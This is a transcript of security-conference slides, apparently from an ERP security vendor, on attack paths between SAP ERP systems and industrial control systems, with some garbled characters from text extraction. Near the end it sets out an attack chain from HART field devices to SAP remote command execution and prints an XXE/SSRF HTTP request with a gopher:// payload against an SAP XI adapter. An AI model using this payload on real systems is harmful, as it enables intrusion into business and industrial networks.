Business breakdown vulnerabilities in ERP via ICS and ICS via ERP

Invest in security to secure investments

Business Breakdown Vulnerabili1es in ERP via ICS and ICS via ERP

Alexander Polyakov CTO ERPScan, President EAS-‐SEC

About ERPScan

•  The only 360-‐degree SAP Security solu1on -‐ ERPScan Security Monitoring Suite for SAP

•  Leader by the number of acknowledgements from SAP ( 150+ ) •  60+ presenta=ons key security conferences worldwide •  25 Awards and nomina=ons •  Research team -‐ 20 experts with experience in different areas

of security •  Headquarters in Palo Alto (US) and Amsterdam (EU)

2

How do they look like

3

3

Portal

HR

BW ECC

Billing

Suppliers

Customers

Banks

Insurance

Partners

Branches

BI

IS CRM

PAS/ EAS

MES

SRM

SCADA/DCS

OPC

PLC’s Field Devices

SolMan SAP AS

XI/PI

How popular they are

SAP •  More than 246000 customers worldwide •  86% of Forbes 500 Oracle •  100% of Fortune 100 Microso^ •  More than 300,000 businesses worldwide choose Microso^

Dynamics ERP and CRM so^ware

4

•  Espionage –  The^ of Financial Informa1on –  Trade Secret the^ –  Supplier and Customer list the^ –  HR data the^ –  Other Corporate Data the^

•  Sabotage –  Denial of service –  Modifica1on of financial statements –  Access to technology network (SCADA/ICS) by trust rela=ons

•  Fraud –  False transac1ons –  Modifica1on of master data

5

What can happen


6

6

Portal

HR

BW ECC

Billing

Suppliers

Customers

Banks

Insurance

Partners

Branches

BI

IS CRM

PAS/ EAS

MES

SRM

SCADA/DCS

OPC


SolMan SAP AS

XI/PI

How easy is that

Systems should be connected with each other •  Directly

–  ERP collects informa1on from PAS/EAS

•  Indirectly –  ERP shares database with MES/EAS –  ERP is connected with ICS/SCADA via XI or PI system

•  In one network –  Exploit typical vulnerabili1es of password sniffing

•  In different networks –  Exploit trust rela1ons

7

Internet to Internal

•  Via Internet resources (SAP Portal/CRM/SRP) •  Via Partners (SAP XI) •  Via SAP Router •  Via Worksta1ons (Trojans) •  Via Unnecessary SAP Services in Internet

8

How to break SAP?

At least: •  Unnecessary privileges •  Misconfigura1ons •  Vulnerabili1es •  Custom code issues

9

Unnecessary privileges

•  One example: Create vendor + Approve Payment order •  Usually ((~100 Roles X 10 ac1ons)^2)/2=500k •  500k poten1al conflicts for each user! •  A lot of work •  Usually takes two years to decrease conflicts from millions to

hundreds.

10

Misconfigura=ons

~1500 profile parameters ~1200 Web-‐applica1ons ~700 webservices ~100 specific commands for mmc ~100 specific checks for each of the 50 modules

11

1.  Lack of patch management 2.  Default passwords 3.  Unnecessary enabled func1onality 4.  Remotely enabled administra1ve services 5.  Insecure configura1on 6.  Unencrypted communica1ons 7.  Internal access control and SoD 8.  Insecure trust rela1ons 9.  Monitoring of security events

12

Misconfigura=ons

13

Only one vulnerability is enough to get access to ALL business-‐cri1cal DATA

0

100

200

300

400

500

600

700

800

900

2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014

By July 2014 – 3000+ notes

Vulnerabili=es

From ERP to ICS

Some systems should be connected at least on the network layer. •  SAP RFC links •  Database links •  Same Domain •  Similar passwords

!TRUST CONNECTIONS – main issue

14

From ICS to ERP

PART 2 (From ICS to ERP)

15

From ICS/Devices to ERP

•  USB (like Stuxnet) •  Wireless devices (Usually bad encryp1on) •  Wired devices (need physical access) •  Aoack on Wire (low level field protocols)

–  RS485 –  Profibus PA –  FF H1 –  HART

16

Big Big Company

17


18

18

Portal

HR

BW ECC

Billing

Suppliers

Customers

Banks

Insurance

Partners

Branches

BI

IS CRM

PAS/ EAS

MES

SRM

SCADA/DCS

OPC


SolMan SAP AS

XI/PI

From ICS to ERP

19

Corporate network ERP

MES

PLC2,3… PLC1

PLC7,8… Field devices

Routers/Firewalls

OPC SCADA/DCS

HMI

Industrial bus

From ICS to ERP

20

•  HART (current loop, 4-‐20 mA) •  Mostly used on power plants, chemical factories, oil & gas

industry •  Every field device (in general, every device) in PAS industrial

facility hierarchy has a unique ID •  For HART devices, HART long tag is used as an universal ID •  HART tag (8 bytes packed ASCII) and HART long tag (32 bytes

ASCII) are used as applica1on layer address

Vulnerabili=es

21

DEMO Infrastructure Corporate network

ERP

Transmioer

Firewall (only HTTP traffic allowed)

FieldCare (PAS)

Current loop (HART Analog 4-‐20mA line)

Ethernet

HART modem

Vulnerabili=es

22

ICSCorsair board

A\ack Scheme

23

Current loop

HART gateway/master

XML data

HART Command 22 Long tag change packet

A' xmlns='x-schema:http://q45.ru Aoacker

HART transmioer

XMLI Evil web server

Request for remote XSD schema

Reply (XSD with SSRF) SSRF

1 2

3

4

5 Internet

PAS (FieldCare)

6 SAP remote command execu1on exploit query

RCE J

ERP

From ERP to ICS

•  SSRF hop://cwe.mitre.org/data/defini1ons/918.html •  Second place in Top 10 web applica1on techniques 2012 •  Allows to bypass firewall restric1ons and directly connect to

protected systems via connected systems

24

SSRF

25

Server B (ERP, HR, BW etc.)

Server A (Portal or XI)

192.168.0.1

172.16.0.1

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: 192.168.0.1:8000 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://172.16.0.1:3300/AAAAAAAAA" >]> <foo>&date;</foo>

AAAAAAAAAAAAA

Port 3300

telnet 172.16.0.1 3300

Conclusion

•  Cri1cal networks are complex •  System is as secure as its most insecure component •  Holis1c approach •  Check eas-‐sec.org

26

Business breakdown vulnerabilities in ERP via ICS and ICS via ERP

Software

Transcript of Business breakdown vulnerabilities in ERP via ICS and ICS via ERP